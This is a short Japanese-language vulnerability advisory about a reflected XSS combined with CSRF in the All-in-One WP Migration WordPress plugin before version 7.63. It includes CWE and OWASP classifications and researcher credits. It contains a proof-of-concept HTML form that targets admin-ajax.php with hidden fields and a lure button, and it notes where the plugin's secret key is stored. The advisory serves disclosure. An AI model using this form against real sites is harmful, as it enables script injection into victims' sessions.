
All-in-One WP Migration < 7.63 - 未認証の反射型XSS + CSRF
このプラグインは、ai1wm_exportアクションのレスポンスに対して誤ったコンテンツタイプを使用し、かつ適切にエスケープしないため、攻撃者がリクエストを細工し、任意の訪問者がそれを送信すると、レスポンスに任意のHTMLやJavaScriptが注入され、被害者のセッション内で実行される可能性があります。
この欠陥を再現するには、プラグインでウェブサイトの全コンテンツをエクスポートし、出力ファイル名に無効な名前を挿入します。
この脆弱性を検証することで、攻撃をCSRFと組み合わせることが可能になり、被害者のブラウザにペイロードを含むリクエストを送信させることができます。
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="">
<input type="submit" value="Get rich!">
</form>
All-in-One WP Migration < 7.63
タイプ: クロスサイトスクリプティング
OWASP TOP 10: A03:2021-Injection
CWE: CWE-79 ウェブページ生成中の入力の不適切な無効化 ('クロスサイトスクリプティング')
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) と Guilherme Acerbi (Ghost).